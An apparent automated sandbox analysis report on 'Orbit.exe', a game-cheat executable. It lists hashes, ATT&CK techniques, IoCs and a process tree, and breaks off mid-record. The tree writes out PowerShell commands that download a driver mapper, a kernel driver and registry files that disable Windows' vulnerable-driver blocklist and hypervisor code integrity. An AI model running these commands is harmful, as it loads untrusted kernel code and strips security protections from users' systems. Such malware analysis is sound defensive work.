161af17c16ca786b6f2836421d11085a551d7678cb018fd929926729d08af2b8

Analysis

max time kernel
134s
max time network
136s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
21-05-2024 14:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Orbit.exe
Size

2.2MB
MD5

6e229ef8a47b4ef6c3cd39eef4b8cd61
SHA1

4fde31b5a4a0a48115da43ab54116a282545902f
SHA256

161af17c16ca786b6f2836421d11085a551d7678cb018fd929926729d08af2b8
SHA512

35513e19f349277e500992da1da88ae98343e900be148a5309afec282b28c00aa02dc491cd3e6ce5290bdeb6322517ea7818d8c28c2d7e696af448ee5967c9ed
SSDEEP

49152:gfNBnwzhM8t4dlOawoQ67Go+H34mxXTH8VyZK3LnP2lL:vXTcL4L

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 31 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow	pid	process
2	4508	powershell.exe
5	2792	powershell.exe
6	2792	powershell.exe
7	3096	powershell.exe
9	3096	powershell.exe
10	948	powershell.exe
11	948	powershell.exe
12	1268	powershell.exe
13	1268	powershell.exe
15	3296	powershell.exe
16	3296	powershell.exe
17	620	powershell.exe
18	620	powershell.exe
19	1008	powershell.exe
20	1008	powershell.exe
21	2004	powershell.exe
22	2004	powershell.exe
23	1464	powershell.exe
24	1464	powershell.exe
25	1524	powershell.exe
26	3112	powershell.exe
27	4188	powershell.exe
28	3192	powershell.exe
29	3388	powershell.exe
30	4240	powershell.exe
31	4264	powershell.exe
32	2108	powershell.exe
33	4572	powershell.exe
34	5028	powershell.exe
35	4980	powershell.exe
36	1800	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

Processes:

pid	process
3112	powershell.exe
4264	powershell.exe
1800	powershell.exe
3096	powershell.exe
1008	powershell.exe
1464	powershell.exe
3192	powershell.exe
3388	powershell.exe
948	powershell.exe
1268	powershell.exe
2108	powershell.exe
4980	powershell.exe
1524	powershell.exe
4240	powershell.exe
3296	powershell.exe
620	powershell.exe
2004	powershell.exe
4188	powershell.exe
4572	powershell.exe
5028	powershell.exe
4508	powershell.exe
2792	powershell.exe

Downloads MZ/PE file

Legitimate hosting services abused for malware hosting/C2 1 TTPs 23 IoCs

Web Service

T1102

Processes:

flow	ioc
25	raw.githubusercontent.com
28	raw.githubusercontent.com
29	raw.githubusercontent.com
30	raw.githubusercontent.com
2	raw.githubusercontent.com
11	raw.githubusercontent.com
18	raw.githubusercontent.com
20	raw.githubusercontent.com
22	raw.githubusercontent.com
31	raw.githubusercontent.com
32	raw.githubusercontent.com
35	raw.githubusercontent.com
1	raw.githubusercontent.com
13	raw.githubusercontent.com
24	raw.githubusercontent.com
33	raw.githubusercontent.com
34	raw.githubusercontent.com
6	raw.githubusercontent.com
9	raw.githubusercontent.com
16	raw.githubusercontent.com
26	raw.githubusercontent.com
27	raw.githubusercontent.com
36	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies registry class 2 IoCs

Processes:

cmd.execmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-873560699-1074803302-2326074425-1000_Classes\Local Settings	cmd.exe

Runs .reg file with regedit 2 IoCs

Processes:

regedit.exeregedit.exe

pid process

3140 regedit.exe
3136 regedit.exe

pid	process
3140	regedit.exe
3136	regedit.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

pid	process
4508	powershell.exe
4508	powershell.exe
4508	powershell.exe
2792	powershell.exe
2792	powershell.exe
2792	powershell.exe
3096	powershell.exe
3096	powershell.exe
3096	powershell.exe
948	powershell.exe
948	powershell.exe
948	powershell.exe
1268	powershell.exe
1268	powershell.exe
1268	powershell.exe
3296	powershell.exe
3296	powershell.exe
3296	powershell.exe
620	powershell.exe
620	powershell.exe
620	powershell.exe
1008	powershell.exe
1008	powershell.exe
1008	powershell.exe
2004	powershell.exe
2004	powershell.exe
2004	powershell.exe
1464	powershell.exe
1464	powershell.exe
1464	powershell.exe
1524	powershell.exe
1524	powershell.exe
1524	powershell.exe
3112	powershell.exe
3112	powershell.exe
3112	powershell.exe
4188	powershell.exe
4188	powershell.exe
4188	powershell.exe
3192	powershell.exe
3192	powershell.exe
3192	powershell.exe
3388	powershell.exe
3388	powershell.exe
3388	powershell.exe
4240	powershell.exe
4240	powershell.exe
4240	powershell.exe
4264	powershell.exe
4264	powershell.exe
4264	powershell.exe
2108	powershell.exe
2108	powershell.exe
2108	powershell.exe
4572	powershell.exe
4572	powershell.exe
4572	powershell.exe
5028	powershell.exe
5028	powershell.exe
5028	powershell.exe
4980	powershell.exe
4980	powershell.exe
4980	powershell.exe
1800	powershell.exe

Suspicious use of AdjustPrivilegeToken 22 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	4508	powershell.exe
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeDebugPrivilege	3096	powershell.exe
Token: SeDebugPrivilege	948	powershell.exe
Token: SeDebugPrivilege	1268	powershell.exe
Token: SeDebugPrivilege	3296	powershell.exe
Token: SeDebugPrivilege	620	powershell.exe
Token: SeDebugPrivilege	1008	powershell.exe
Token: SeDebugPrivilege	2004	powershell.exe
Token: SeDebugPrivilege	1464	powershell.exe
Token: SeDebugPrivilege	1524	powershell.exe
Token: SeDebugPrivilege	3112	powershell.exe
Token: SeDebugPrivilege	4188	powershell.exe
Token: SeDebugPrivilege	3192	powershell.exe
Token: SeDebugPrivilege	3388	powershell.exe
Token: SeDebugPrivilege	4240	powershell.exe
Token: SeDebugPrivilege	4264	powershell.exe
Token: SeDebugPrivilege	2108	powershell.exe
Token: SeDebugPrivilege	4572	powershell.exe
Token: SeDebugPrivilege	5028	powershell.exe
Token: SeDebugPrivilege	4980	powershell.exe
Token: SeDebugPrivilege	1800	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

Orbit.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4300 wrote to memory of 1152	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 1152	4300	Orbit.exe	cmd.exe
PID 1152 wrote to memory of 4508	1152	cmd.exe	powershell.exe
PID 1152 wrote to memory of 4508	1152	cmd.exe	powershell.exe
PID 4300 wrote to memory of 2992	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 2992	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 4924	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 4924	4300	Orbit.exe	cmd.exe
PID 4924 wrote to memory of 2792	4924	cmd.exe	powershell.exe
PID 4924 wrote to memory of 2792	4924	cmd.exe	powershell.exe
PID 4300 wrote to memory of 4340	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 4340	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 3292	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 3292	4300	Orbit.exe	cmd.exe
PID 3292 wrote to memory of 3096	3292	cmd.exe	powershell.exe
PID 3292 wrote to memory of 3096	3292	cmd.exe	powershell.exe
PID 4300 wrote to memory of 4516	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 4516	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 356	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 356	4300	Orbit.exe	cmd.exe
PID 356 wrote to memory of 948	356	cmd.exe	powershell.exe
PID 356 wrote to memory of 948	356	cmd.exe	powershell.exe
PID 4300 wrote to memory of 1884	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 1884	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 4596	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 4596	4300	Orbit.exe	cmd.exe
PID 4596 wrote to memory of 1268	4596	cmd.exe	powershell.exe
PID 4596 wrote to memory of 1268	4596	cmd.exe	powershell.exe
PID 4300 wrote to memory of 2692	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 2692	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 1584	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 1584	4300	Orbit.exe	cmd.exe
PID 1584 wrote to memory of 3296	1584	cmd.exe	powershell.exe
PID 1584 wrote to memory of 3296	1584	cmd.exe	powershell.exe
PID 4300 wrote to memory of 3552	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 3552	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 2880	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 2880	4300	Orbit.exe	cmd.exe
PID 2880 wrote to memory of 620	2880	cmd.exe	powershell.exe
PID 2880 wrote to memory of 620	2880	cmd.exe	powershell.exe
PID 4300 wrote to memory of 2168	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 2168	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 4120	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 4120	4300	Orbit.exe	cmd.exe
PID 4120 wrote to memory of 1008	4120	cmd.exe	powershell.exe
PID 4120 wrote to memory of 1008	4120	cmd.exe	powershell.exe
PID 4300 wrote to memory of 1188	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 1188	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 2472	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 2472	4300	Orbit.exe	cmd.exe
PID 2472 wrote to memory of 2004	2472	cmd.exe	powershell.exe
PID 2472 wrote to memory of 2004	2472	cmd.exe	powershell.exe
PID 4300 wrote to memory of 3712	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 3712	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 316	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 316	4300	Orbit.exe	cmd.exe
PID 316 wrote to memory of 1464	316	cmd.exe	powershell.exe
PID 316 wrote to memory of 1464	316	cmd.exe	powershell.exe
PID 4300 wrote to memory of 2232	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 2232	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 1576	4300	Orbit.exe	cmd.exe
PID 4300 wrote to memory of 1576	4300	Orbit.exe	cmd.exe
PID 1576 wrote to memory of 1524	1576	cmd.exe	powershell.exe
PID 1576 wrote to memory of 1524	1576	cmd.exe	powershell.exe

C:\Users\Admin\AppData\Local\Temp\Orbit.exe
"C:\Users\Admin\AppData\Local\Temp\Orbit.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:4300
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Version.txt').Content
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1152
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "(Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Version.txt').Content
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ZirczWare/Kernel-Cheat/raw/main/Zappericons-Regular.ttf' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Zappericons-Regular.ttf'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4924
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ZirczWare/Kernel-Cheat/raw/main/Zappericons-Regular.ttf' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Zappericons-Regular.ttf'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ZirczWare/Kernel-Cheat/raw/main/Weaponicons-Regular.ttf' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Weaponicons-Regular.ttf'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3292
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ZirczWare/Kernel-Cheat/raw/main/Weaponicons-Regular.ttf' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Weaponicons-Regular.ttf'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ZirczWare/Kernel-Cheat/raw/main/SamsungSans-Regular.ttf' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\SamsungSans-Regular.ttf'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:356
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ZirczWare/Kernel-Cheat/raw/main/SamsungSans-Regular.ttf' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\SamsungSans-Regular.ttf'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:948
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ZirczWare/Kernel-Cheat/raw/main/SmallestPixel7-Regular.ttf' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\SmallestPixel7-Regular.ttf'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4596
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ZirczWare/Kernel-Cheat/raw/main/SmallestPixel7-Regular.ttf' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\SmallestPixel7-Regular.ttf'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1268
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ZirczWare/Kernel-Cheat/raw/main/DriverMapper.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\DriverMapper.exe'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1584
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ZirczWare/Kernel-Cheat/raw/main/DriverMapper.exe' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\DriverMapper.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3552
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ZirczWare/Kernel-Cheat/raw/main/Win10_22H2.sys' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Win10_22H2.sys'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2880
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ZirczWare/Kernel-Cheat/raw/main/Win10_22H2.sys' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Win10_22H2.sys'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:620
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2168
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ZirczWare/Kernel-Cheat/raw/main/DisableVulnerableDriverList.reg' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\DisableVulnerableDriverList.reg'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4120
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ZirczWare/Kernel-Cheat/raw/main/DisableVulnerableDriverList.reg' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\DisableVulnerableDriverList.reg'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1008
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:1188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ZirczWare/Kernel-Cheat/raw/main/DisableHypervisorEnforcedCodeIntegrity.reg' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\DisableHypervisorEnforcedCodeIntegrity.reg'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2472
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ZirczWare/Kernel-Cheat/raw/main/DisableHypervisorEnforcedCodeIntegrity.reg' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\DisableHypervisorEnforcedCodeIntegrity.reg'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3712
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ZirczWare/Kernel-Cheat/raw/main/GrenadeHelper.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\GrenadeHelper.txt'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:316
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/ZirczWare/Kernel-Cheat/raw/main/GrenadeHelper.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\GrenadeHelper.txt'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1464
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Orbit%20Mapdata/ar_baggage.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Orbit Mapdata\ar_baggage.txt'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1576
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Orbit%20Mapdata/ar_baggage.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Orbit Mapdata\ar_baggage.txt'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1524
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Orbit%20Mapdata/ar_shoots.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Orbit Mapdata\ar_shoots.txt'"
  2⤵
  PID:4900
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Orbit%20Mapdata/ar_shoots.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Orbit Mapdata\ar_shoots.txt'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Orbit%20Mapdata/cs_italy.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Orbit Mapdata\cs_italy.txt'"
  2⤵
  PID:644
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Orbit%20Mapdata/cs_italy.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Orbit Mapdata\cs_italy.txt'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4188
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Orbit%20Mapdata/cs_office.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Orbit Mapdata\cs_office.txt'"
  2⤵
  PID:4272
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Orbit%20Mapdata/cs_office.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Orbit Mapdata\cs_office.txt'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3192
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Orbit%20Mapdata/de_ancient.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Orbit Mapdata\de_ancient.txt'"
  2⤵
  PID:1472
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Orbit%20Mapdata/de_ancient.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Orbit Mapdata\de_ancient.txt'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4308
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Orbit%20Mapdata/de_anubis.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Orbit Mapdata\de_anubis.txt'"
  2⤵
  PID:196
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Orbit%20Mapdata/de_anubis.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Orbit Mapdata\de_anubis.txt'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4556
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Orbit%20Mapdata/de_dust2.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Orbit Mapdata\de_dust2.txt'"
  2⤵
  PID:4436
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Orbit%20Mapdata/de_dust2.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Orbit Mapdata\de_dust2.txt'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4264
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:4400
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Orbit%20Mapdata/de_inferno.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Orbit Mapdata\de_inferno.txt'"
  2⤵
  PID:4388
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Orbit%20Mapdata/de_inferno.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Orbit Mapdata\de_inferno.txt'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:2332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Orbit%20Mapdata/de_mirage.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Orbit Mapdata\de_mirage.txt'"
  2⤵
  PID:2952
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Orbit%20Mapdata/de_mirage.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Orbit Mapdata\de_mirage.txt'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c cls
  2⤵
  PID:3596
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/ZirczWare/Kernel-Cheat/main/Orbit%20Mapdata/de_nuke.txt' -OutFile 'C:\Users\Admin\AppData\Roaming\Orbit\Orbit Mapdata\de_nuke.txt'"
  2⤵
  PID:1236
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
